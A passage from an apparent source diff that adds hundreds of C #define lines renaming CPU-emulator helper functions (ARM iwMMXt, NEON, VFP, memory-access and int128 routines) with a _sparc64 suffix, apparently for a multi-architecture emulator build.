helper_iwmmxt_muluhw helper_iwmmxt_muluhw_sparc64 +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_sparc64 +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_sparc64 +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_sparc64 +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_sparc64 +#define helper_iwmmxt_packul helper_iwmmxt_packul_sparc64 +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_sparc64 +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_sparc64 +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_sparc64 +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_sparc64 +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_sparc64 +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_sparc64 +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_sparc64 +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_sparc64 +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_sparc64 +#define helper_iwmmxt_slll helper_iwmmxt_slll_sparc64 +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_sparc64 +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_sparc64 +#define helper_iwmmxt_sral helper_iwmmxt_sral_sparc64 +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_sparc64 +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_sparc64 +#define helper_iwmmxt_srll helper_iwmmxt_srll_sparc64 +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_sparc64 +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_sparc64 +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_sparc64 +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_sparc64 +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_sparc64 +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_sparc64 +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_sparc64 +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_sparc64 +#define helper_iwmmxt_subub helper_iwmmxt_subub_sparc64 +#define helper_iwmmxt_subul helper_iwmmxt_subul_sparc64 +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_sparc64 +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_sparc64 +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_sparc64 +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_sparc64 +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_sparc64 +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_sparc64 +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_sparc64 +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_sparc64 +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_sparc64 +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_sparc64 +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_sparc64 +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_sparc64 +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_sparc64 +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_sparc64 +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_sparc64 +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_sparc64 +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_sparc64 +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_sparc64 +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_sparc64 +#define helper_ldb_cmmu helper_ldb_cmmu_sparc64 +#define helper_ldb_mmu helper_ldb_mmu_sparc64 +#define helper_ldl_cmmu helper_ldl_cmmu_sparc64 +#define helper_ldl_mmu helper_ldl_mmu_sparc64 +#define helper_ldq_cmmu helper_ldq_cmmu_sparc64 +#define helper_ldq_mmu helper_ldq_mmu_sparc64 +#define helper_ldw_cmmu helper_ldw_cmmu_sparc64 +#define helper_ldw_mmu helper_ldw_mmu_sparc64 +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_sparc64 +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_sparc64 +#define helper_le_ldq_mmu helper_le_ldq_mmu_sparc64 +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_sparc64 +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_sparc64 +#define helper_le_ldul_mmu helper_le_ldul_mmu_sparc64 +#define helper_le_lduw_mmu helper_le_lduw_mmu_sparc64 +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_sparc64 +#define helper_le_stl_mmu helper_le_stl_mmu_sparc64 +#define helper_le_stq_mmu helper_le_stq_mmu_sparc64 +#define helper_le_stw_mmu helper_le_stw_mmu_sparc64 +#define helper_msr_i_pstate helper_msr_i_pstate_sparc64 +#define helper_neon_abd_f32 helper_neon_abd_f32_sparc64 +#define helper_neon_abdl_s16 helper_neon_abdl_s16_sparc64 +#define helper_neon_abdl_s32 helper_neon_abdl_s32_sparc64 +#define helper_neon_abdl_s64 helper_neon_abdl_s64_sparc64 +#define helper_neon_abdl_u16 helper_neon_abdl_u16_sparc64 +#define helper_neon_abdl_u32 helper_neon_abdl_u32_sparc64 +#define helper_neon_abdl_u64 helper_neon_abdl_u64_sparc64 +#define helper_neon_abd_s16 helper_neon_abd_s16_sparc64 +#define helper_neon_abd_s32 helper_neon_abd_s32_sparc64 +#define helper_neon_abd_s8 helper_neon_abd_s8_sparc64 +#define helper_neon_abd_u16 helper_neon_abd_u16_sparc64 +#define helper_neon_abd_u32 helper_neon_abd_u32_sparc64 +#define helper_neon_abd_u8 helper_neon_abd_u8_sparc64 +#define helper_neon_abs_s16 helper_neon_abs_s16_sparc64 +#define helper_neon_abs_s8 helper_neon_abs_s8_sparc64 +#define helper_neon_acge_f32 helper_neon_acge_f32_sparc64 +#define helper_neon_acge_f64 helper_neon_acge_f64_sparc64 +#define helper_neon_acgt_f32 helper_neon_acgt_f32_sparc64 +#define helper_neon_acgt_f64 helper_neon_acgt_f64_sparc64 +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_sparc64 +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_sparc64 +#define helper_neon_addl_u16 helper_neon_addl_u16_sparc64 +#define helper_neon_addl_u32 helper_neon_addl_u32_sparc64 +#define helper_neon_add_u16 helper_neon_add_u16_sparc64 +#define helper_neon_add_u8 helper_neon_add_u8_sparc64 +#define helper_neon_ceq_f32 helper_neon_ceq_f32_sparc64 +#define helper_neon_ceq_u16 helper_neon_ceq_u16_sparc64 +#define helper_neon_ceq_u32 helper_neon_ceq_u32_sparc64 +#define helper_neon_ceq_u8 helper_neon_ceq_u8_sparc64 +#define helper_neon_cge_f32 helper_neon_cge_f32_sparc64 +#define helper_neon_cge_s16 helper_neon_cge_s16_sparc64 +#define helper_neon_cge_s32 helper_neon_cge_s32_sparc64 +#define helper_neon_cge_s8 helper_neon_cge_s8_sparc64 +#define helper_neon_cge_u16 helper_neon_cge_u16_sparc64 +#define helper_neon_cge_u32 helper_neon_cge_u32_sparc64 +#define helper_neon_cge_u8 helper_neon_cge_u8_sparc64 +#define helper_neon_cgt_f32 helper_neon_cgt_f32_sparc64 +#define helper_neon_cgt_s16 helper_neon_cgt_s16_sparc64 +#define helper_neon_cgt_s32 helper_neon_cgt_s32_sparc64 +#define helper_neon_cgt_s8 helper_neon_cgt_s8_sparc64 +#define helper_neon_cgt_u16 helper_neon_cgt_u16_sparc64 +#define helper_neon_cgt_u32 helper_neon_cgt_u32_sparc64 +#define helper_neon_cgt_u8 helper_neon_cgt_u8_sparc64 +#define helper_neon_cls_s16 helper_neon_cls_s16_sparc64 +#define helper_neon_cls_s32 helper_neon_cls_s32_sparc64 +#define helper_neon_cls_s8 helper_neon_cls_s8_sparc64 +#define helper_neon_clz_u16 helper_neon_clz_u16_sparc64 +#define helper_neon_clz_u8 helper_neon_clz_u8_sparc64 +#define helper_neon_cnt_u8 helper_neon_cnt_u8_sparc64 +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_sparc64 +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_sparc64 +#define helper_neon_hadd_s16 helper_neon_hadd_s16_sparc64 +#define helper_neon_hadd_s32 helper_neon_hadd_s32_sparc64 +#define helper_neon_hadd_s8 helper_neon_hadd_s8_sparc64 +#define helper_neon_hadd_u16 helper_neon_hadd_u16_sparc64 +#define helper_neon_hadd_u32 helper_neon_hadd_u32_sparc64 +#define helper_neon_hadd_u8 helper_neon_hadd_u8_sparc64 +#define helper_neon_hsub_s16 helper_neon_hsub_s16_sparc64 +#define helper_neon_hsub_s32 helper_neon_hsub_s32_sparc64 +#define helper_neon_hsub_s8 helper_neon_hsub_s8_sparc64 +#define helper_neon_hsub_u16 helper_neon_hsub_u16_sparc64 +#define helper_neon_hsub_u32 helper_neon_hsub_u32_sparc64 +#define helper_neon_hsub_u8 helper_neon_hsub_u8_sparc64 +#define helper_neon_max_s16 helper_neon_max_s16_sparc64 +#define helper_neon_max_s32 helper_neon_max_s32_sparc64 +#define helper_neon_max_s8 helper_neon_max_s8_sparc64 +#define helper_neon_max_u16 helper_neon_max_u16_sparc64 +#define helper_neon_max_u32 helper_neon_max_u32_sparc64 +#define helper_neon_max_u8 helper_neon_max_u8_sparc64 +#define helper_neon_min_s16 helper_neon_min_s16_sparc64 +#define helper_neon_min_s32 helper_neon_min_s32_sparc64 +#define helper_neon_min_s8 helper_neon_min_s8_sparc64 +#define helper_neon_min_u16 helper_neon_min_u16_sparc64 +#define helper_neon_min_u32 helper_neon_min_u32_sparc64 +#define helper_neon_min_u8 helper_neon_min_u8_sparc64 +#define helper_neon_mull_p8 helper_neon_mull_p8_sparc64 +#define helper_neon_mull_s16 helper_neon_mull_s16_sparc64 +#define helper_neon_mull_s8 helper_neon_mull_s8_sparc64 +#define helper_neon_mull_u16 helper_neon_mull_u16_sparc64 +#define helper_neon_mull_u8 helper_neon_mull_u8_sparc64 +#define helper_neon_mul_p8 helper_neon_mul_p8_sparc64 +#define helper_neon_mul_u16 helper_neon_mul_u16_sparc64 +#define helper_neon_mul_u8 helper_neon_mul_u8_sparc64 +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_sparc64 +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_sparc64 +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_sparc64 +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_sparc64 +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_sparc64 +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_sparc64 +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_sparc64 +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_sparc64 +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_sparc64 +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_sparc64 +#define helper_neon_narrow_u16 helper_neon_narrow_u16_sparc64 +#define helper_neon_narrow_u8 helper_neon_narrow_u8_sparc64 +#define helper_neon_negl_u16 helper_neon_negl_u16_sparc64 +#define helper_neon_negl_u32 helper_neon_negl_u32_sparc64 +#define helper_neon_paddl_u16 helper_neon_paddl_u16_sparc64 +#define helper_neon_paddl_u32 helper_neon_paddl_u32_sparc64 +#define helper_neon_padd_u16 helper_neon_padd_u16_sparc64 +#define helper_neon_padd_u8 helper_neon_padd_u8_sparc64 +#define helper_neon_pmax_s16 helper_neon_pmax_s16_sparc64 +#define helper_neon_pmax_s8 helper_neon_pmax_s8_sparc64 +#define helper_neon_pmax_u16 helper_neon_pmax_u16_sparc64 +#define helper_neon_pmax_u8 helper_neon_pmax_u8_sparc64 +#define helper_neon_pmin_s16 helper_neon_pmin_s16_sparc64 +#define helper_neon_pmin_s8 helper_neon_pmin_s8_sparc64 +#define helper_neon_pmin_u16 helper_neon_pmin_u16_sparc64 +#define helper_neon_pmin_u8 helper_neon_pmin_u8_sparc64 +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_sparc64 +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_sparc64 +#define helper_neon_qabs_s16 helper_neon_qabs_s16_sparc64 +#define helper_neon_qabs_s32 helper_neon_qabs_s32_sparc64 +#define helper_neon_qabs_s64 helper_neon_qabs_s64_sparc64 +#define helper_neon_qabs_s8 helper_neon_qabs_s8_sparc64 +#define helper_neon_qadd_s16 helper_neon_qadd_s16_sparc64 +#define helper_neon_qadd_s32 helper_neon_qadd_s32_sparc64 +#define helper_neon_qadd_s64 helper_neon_qadd_s64_sparc64 +#define helper_neon_qadd_s8 helper_neon_qadd_s8_sparc64 +#define helper_neon_qadd_u16 helper_neon_qadd_u16_sparc64 +#define helper_neon_qadd_u32 helper_neon_qadd_u32_sparc64 +#define helper_neon_qadd_u64 helper_neon_qadd_u64_sparc64 +#define helper_neon_qadd_u8 helper_neon_qadd_u8_sparc64 +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_sparc64 +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_sparc64 +#define helper_neon_qneg_s16 helper_neon_qneg_s16_sparc64 +#define helper_neon_qneg_s32 helper_neon_qneg_s32_sparc64 +#define helper_neon_qneg_s64 helper_neon_qneg_s64_sparc64 +#define helper_neon_qneg_s8 helper_neon_qneg_s8_sparc64 +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_sparc64 +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_sparc64 +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_sparc64 +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_sparc64 +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_sparc64 +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_sparc64 +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_sparc64 +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_sparc64 +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_sparc64 +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_sparc64 +#define helper_neon_qshl_s16 helper_neon_qshl_s16_sparc64 +#define helper_neon_qshl_s32 helper_neon_qshl_s32_sparc64 +#define helper_neon_qshl_s64 helper_neon_qshl_s64_sparc64 +#define helper_neon_qshl_s8 helper_neon_qshl_s8_sparc64 +#define helper_neon_qshl_u16 helper_neon_qshl_u16_sparc64 +#define helper_neon_qshl_u32 helper_neon_qshl_u32_sparc64 +#define helper_neon_qshl_u64 helper_neon_qshl_u64_sparc64 +#define helper_neon_qshl_u8 helper_neon_qshl_u8_sparc64 +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_sparc64 +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_sparc64 +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_sparc64 +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_sparc64 +#define helper_neon_qsub_s16 helper_neon_qsub_s16_sparc64 +#define helper_neon_qsub_s32 helper_neon_qsub_s32_sparc64 +#define helper_neon_qsub_s64 helper_neon_qsub_s64_sparc64 +#define helper_neon_qsub_s8 helper_neon_qsub_s8_sparc64 +#define helper_neon_qsub_u16 helper_neon_qsub_u16_sparc64 +#define helper_neon_qsub_u32 helper_neon_qsub_u32_sparc64 +#define helper_neon_qsub_u64 helper_neon_qsub_u64_sparc64 +#define helper_neon_qsub_u8 helper_neon_qsub_u8_sparc64 +#define helper_neon_qunzip16 helper_neon_qunzip16_sparc64 +#define helper_neon_qunzip32 helper_neon_qunzip32_sparc64 +#define helper_neon_qunzip8 helper_neon_qunzip8_sparc64 +#define helper_neon_qzip16 helper_neon_qzip16_sparc64 +#define helper_neon_qzip32 helper_neon_qzip32_sparc64 +#define helper_neon_qzip8 helper_neon_qzip8_sparc64 +#define helper_neon_rbit_u8 helper_neon_rbit_u8_sparc64 +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_sparc64 +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_sparc64 +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_sparc64 +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_sparc64 +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_sparc64 +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_sparc64 +#define helper_neon_rshl_s16 helper_neon_rshl_s16_sparc64 +#define helper_neon_rshl_s32 helper_neon_rshl_s32_sparc64 +#define helper_neon_rshl_s64 helper_neon_rshl_s64_sparc64 +#define helper_neon_rshl_s8 helper_neon_rshl_s8_sparc64 +#define helper_neon_rshl_u16 helper_neon_rshl_u16_sparc64 +#define helper_neon_rshl_u32 helper_neon_rshl_u32_sparc64 +#define helper_neon_rshl_u64 helper_neon_rshl_u64_sparc64 +#define helper_neon_rshl_u8 helper_neon_rshl_u8_sparc64 +#define helper_neon_shl_s16 helper_neon_shl_s16_sparc64 +#define helper_neon_shl_s32 helper_neon_shl_s32_sparc64 +#define helper_neon_shl_s64 helper_neon_shl_s64_sparc64 +#define helper_neon_shl_s8 helper_neon_shl_s8_sparc64 +#define helper_neon_shl_u16 helper_neon_shl_u16_sparc64 +#define helper_neon_shl_u32 helper_neon_shl_u32_sparc64 +#define helper_neon_shl_u64 helper_neon_shl_u64_sparc64 +#define helper_neon_shl_u8 helper_neon_shl_u8_sparc64 +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_sparc64 +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_sparc64 +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_sparc64 +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_sparc64 +#define helper_neon_subl_u16 helper_neon_subl_u16_sparc64 +#define helper_neon_subl_u32 helper_neon_subl_u32_sparc64 +#define helper_neon_sub_u16 helper_neon_sub_u16_sparc64 +#define helper_neon_sub_u8 helper_neon_sub_u8_sparc64 +#define helper_neon_tbl helper_neon_tbl_sparc64 +#define helper_neon_tst_u16 helper_neon_tst_u16_sparc64 +#define helper_neon_tst_u32 helper_neon_tst_u32_sparc64 +#define helper_neon_tst_u8 helper_neon_tst_u8_sparc64 +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_sparc64 +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_sparc64 +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_sparc64 +#define helper_neon_unzip16 helper_neon_unzip16_sparc64 +#define helper_neon_unzip8 helper_neon_unzip8_sparc64 +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_sparc64 +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_sparc64 +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_sparc64 +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_sparc64 +#define helper_neon_widen_s16 helper_neon_widen_s16_sparc64 +#define helper_neon_widen_s8 helper_neon_widen_s8_sparc64 +#define helper_neon_widen_u16 helper_neon_widen_u16_sparc64 +#define helper_neon_widen_u8 helper_neon_widen_u8_sparc64 +#define helper_neon_zip16 helper_neon_zip16_sparc64 +#define helper_neon_zip8 helper_neon_zip8_sparc64 +#define helper_pre_hvc helper_pre_hvc_sparc64 +#define helper_pre_smc helper_pre_smc_sparc64 +#define helper_qadd16 helper_qadd16_sparc64 +#define helper_qadd8 helper_qadd8_sparc64 +#define helper_qaddsubx helper_qaddsubx_sparc64 +#define helper_qsub16 helper_qsub16_sparc64 +#define helper_qsub8 helper_qsub8_sparc64 +#define helper_qsubaddx helper_qsubaddx_sparc64 +#define helper_rbit helper_rbit_sparc64 +#define helper_recpe_f32 helper_recpe_f32_sparc64 +#define helper_recpe_f64 helper_recpe_f64_sparc64 +#define helper_recpe_u32 helper_recpe_u32_sparc64 +#define helper_recps_f32 helper_recps_f32_sparc64 +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_sparc64 +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_sparc64 +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_sparc64 +#define helper_ret_stb_mmu helper_ret_stb_mmu_sparc64 +#define helper_rintd helper_rintd_sparc64 +#define helper_rintd_exact helper_rintd_exact_sparc64 +#define helper_rints helper_rints_sparc64 +#define helper_rints_exact helper_rints_exact_sparc64 +#define helper_ror_cc helper_ror_cc_sparc64 +#define helper_rsqrte_f32 helper_rsqrte_f32_sparc64 +#define helper_rsqrte_f64 helper_rsqrte_f64_sparc64 +#define helper_rsqrte_u32 helper_rsqrte_u32_sparc64 +#define helper_rsqrts_f32 helper_rsqrts_f32_sparc64 +#define helper_sadd16 helper_sadd16_sparc64 +#define helper_sadd8 helper_sadd8_sparc64 +#define helper_saddsubx helper_saddsubx_sparc64 +#define helper_sar_cc helper_sar_cc_sparc64 +#define helper_sdiv helper_sdiv_sparc64 +#define helper_sel_flags helper_sel_flags_sparc64 +#define helper_set_cp_reg helper_set_cp_reg_sparc64 +#define helper_set_cp_reg64 helper_set_cp_reg64_sparc64 +#define helper_set_neon_rmode helper_set_neon_rmode_sparc64 +#define helper_set_r13_banked helper_set_r13_banked_sparc64 +#define helper_set_rmode helper_set_rmode_sparc64 +#define helper_set_user_reg helper_set_user_reg_sparc64 +#define helper_shadd16 helper_shadd16_sparc64 +#define helper_shadd8 helper_shadd8_sparc64 +#define helper_shaddsubx helper_shaddsubx_sparc64 +#define helper_shl_cc helper_shl_cc_sparc64 +#define helper_shr_cc helper_shr_cc_sparc64 +#define helper_shsub16 helper_shsub16_sparc64 +#define helper_shsub8 helper_shsub8_sparc64 +#define helper_shsubaddx helper_shsubaddx_sparc64 +#define helper_ssat helper_ssat_sparc64 +#define helper_ssat16 helper_ssat16_sparc64 +#define helper_ssub16 helper_ssub16_sparc64 +#define helper_ssub8 helper_ssub8_sparc64 +#define helper_ssubaddx helper_ssubaddx_sparc64 +#define helper_stb_mmu helper_stb_mmu_sparc64 +#define helper_stl_mmu helper_stl_mmu_sparc64 +#define helper_stq_mmu helper_stq_mmu_sparc64 +#define helper_stw_mmu helper_stw_mmu_sparc64 +#define helper_sub_saturate helper_sub_saturate_sparc64 +#define helper_sub_usaturate helper_sub_usaturate_sparc64 +#define helper_sxtb16 helper_sxtb16_sparc64 +#define helper_uadd16 helper_uadd16_sparc64 +#define helper_uadd8 helper_uadd8_sparc64 +#define helper_uaddsubx helper_uaddsubx_sparc64 +#define helper_udiv helper_udiv_sparc64 +#define helper_uhadd16 helper_uhadd16_sparc64 +#define helper_uhadd8 helper_uhadd8_sparc64 +#define helper_uhaddsubx helper_uhaddsubx_sparc64 +#define helper_uhsub16 helper_uhsub16_sparc64 +#define helper_uhsub8 helper_uhsub8_sparc64 +#define helper_uhsubaddx helper_uhsubaddx_sparc64 +#define helper_uqadd16 helper_uqadd16_sparc64 +#define helper_uqadd8 helper_uqadd8_sparc64 +#define helper_uqaddsubx helper_uqaddsubx_sparc64 +#define helper_uqsub16 helper_uqsub16_sparc64 +#define helper_uqsub8 helper_uqsub8_sparc64 +#define helper_uqsubaddx helper_uqsubaddx_sparc64 +#define helper_usad8 helper_usad8_sparc64 +#define helper_usat helper_usat_sparc64 +#define helper_usat16 helper_usat16_sparc64 +#define helper_usub16 helper_usub16_sparc64 +#define helper_usub8 helper_usub8_sparc64 +#define helper_usubaddx helper_usubaddx_sparc64 +#define helper_uxtb16 helper_uxtb16_sparc64 +#define helper_v7m_mrs helper_v7m_mrs_sparc64 +#define helper_v7m_msr helper_v7m_msr_sparc64 +#define helper_vfp_absd helper_vfp_absd_sparc64 +#define helper_vfp_abss helper_vfp_abss_sparc64 +#define helper_vfp_addd helper_vfp_addd_sparc64 +#define helper_vfp_adds helper_vfp_adds_sparc64 +#define helper_vfp_cmpd helper_vfp_cmpd_sparc64 +#define helper_vfp_cmped helper_vfp_cmped_sparc64 +#define helper_vfp_cmpes helper_vfp_cmpes_sparc64 +#define helper_vfp_cmps helper_vfp_cmps_sparc64 +#define helper_vfp_divd helper_vfp_divd_sparc64 +#define helper_vfp_divs helper_vfp_divs_sparc64 +#define helper_vfp_fcvtds helper_vfp_fcvtds_sparc64 +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_sparc64 +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_sparc64 +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_sparc64 +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_sparc64 +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_sparc64 +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_sparc64 +#define helper_vfp_maxd helper_vfp_maxd_sparc64 +#define helper_vfp_maxnumd helper_vfp_maxnumd_sparc64 +#define helper_vfp_maxnums helper_vfp_maxnums_sparc64 +#define helper_vfp_maxs helper_vfp_maxs_sparc64 +#define helper_vfp_mind helper_vfp_mind_sparc64 +#define helper_vfp_minnumd helper_vfp_minnumd_sparc64 +#define helper_vfp_minnums helper_vfp_minnums_sparc64 +#define helper_vfp_mins helper_vfp_mins_sparc64 +#define helper_vfp_muladdd helper_vfp_muladdd_sparc64 +#define helper_vfp_muladds helper_vfp_muladds_sparc64 +#define helper_vfp_muld helper_vfp_muld_sparc64 +#define helper_vfp_muls helper_vfp_muls_sparc64 +#define helper_vfp_negd helper_vfp_negd_sparc64 +#define helper_vfp_negs helper_vfp_negs_sparc64 +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_sparc64 +#define helper_vfp_shtod helper_vfp_shtod_sparc64 +#define helper_vfp_shtos helper_vfp_shtos_sparc64 +#define helper_vfp_sitod helper_vfp_sitod_sparc64 +#define helper_vfp_sitos helper_vfp_sitos_sparc64 +#define helper_vfp_sltod helper_vfp_sltod_sparc64 +#define helper_vfp_sltos helper_vfp_sltos_sparc64 +#define helper_vfp_sqrtd helper_vfp_sqrtd_sparc64 +#define helper_vfp_sqrts helper_vfp_sqrts_sparc64 +#define helper_vfp_sqtod helper_vfp_sqtod_sparc64 +#define helper_vfp_sqtos helper_vfp_sqtos_sparc64 +#define helper_vfp_subd helper_vfp_subd_sparc64 +#define helper_vfp_subs helper_vfp_subs_sparc64 +#define helper_vfp_toshd helper_vfp_toshd_sparc64 +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_sparc64 +#define helper_vfp_toshs helper_vfp_toshs_sparc64 +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_sparc64 +#define helper_vfp_tosid helper_vfp_tosid_sparc64 +#define helper_vfp_tosis helper_vfp_tosis_sparc64 +#define helper_vfp_tosizd helper_vfp_tosizd_sparc64 +#define helper_vfp_tosizs helper_vfp_tosizs_sparc64 +#define helper_vfp_tosld helper_vfp_tosld_sparc64 +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_sparc64 +#define helper_vfp_tosls helper_vfp_tosls_sparc64 +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_sparc64 +#define helper_vfp_tosqd helper_vfp_tosqd_sparc64 +#define helper_vfp_tosqs helper_vfp_tosqs_sparc64 +#define helper_vfp_touhd helper_vfp_touhd_sparc64 +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_sparc64 +#define helper_vfp_touhs helper_vfp_touhs_sparc64 +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_sparc64 +#define helper_vfp_touid helper_vfp_touid_sparc64 +#define helper_vfp_touis helper_vfp_touis_sparc64 +#define helper_vfp_touizd helper_vfp_touizd_sparc64 +#define helper_vfp_touizs helper_vfp_touizs_sparc64 +#define helper_vfp_tould helper_vfp_tould_sparc64 +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_sparc64 +#define helper_vfp_touls helper_vfp_touls_sparc64 +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_sparc64 +#define helper_vfp_touqd helper_vfp_touqd_sparc64 +#define helper_vfp_touqs helper_vfp_touqs_sparc64 +#define helper_vfp_uhtod helper_vfp_uhtod_sparc64 +#define helper_vfp_uhtos helper_vfp_uhtos_sparc64 +#define helper_vfp_uitod helper_vfp_uitod_sparc64 +#define helper_vfp_uitos helper_vfp_uitos_sparc64 +#define helper_vfp_ultod helper_vfp_ultod_sparc64 +#define helper_vfp_ultos helper_vfp_ultos_sparc64 +#define helper_vfp_uqtod helper_vfp_uqtod_sparc64 +#define helper_vfp_uqtos helper_vfp_uqtos_sparc64 +#define helper_wfe helper_wfe_sparc64 +#define helper_wfi helper_wfi_sparc64 +#define hex2decimal hex2decimal_sparc64 +#define hw_breakpoint_update hw_breakpoint_update_sparc64 +#define hw_breakpoint_update_all hw_breakpoint_update_all_sparc64 +#define hw_watchpoint_update hw_watchpoint_update_sparc64 +#define hw_watchpoint_update_all hw_watchpoint_update_all_sparc64 +#define _init _init_sparc64 +#define init_cpreg_list init_cpreg_list_sparc64 +#define init_lists init_lists_sparc64 +#define input_type_enum input_type_enum_sparc64 +#define int128_2_64 int128_2_64_sparc64 +#define int128_add int128_add_sparc64 +#define int128_addto int128_addto_sparc64 +#define int128_and int128_and_sparc64 +#define int128_eq int128_eq_sparc64 +#define int128_ge int128_ge_sparc64 +#define int128_get64 int128_get64_sparc64 +#define int128_gt int128_gt_sparc64 +#define int128_le int128_le_sparc64 +#define int128_lt int128_lt_sparc64 +#define int128_make64 int128_make64_sparc64 +#define int128_max int128_max_sparc64 +#define int128_min 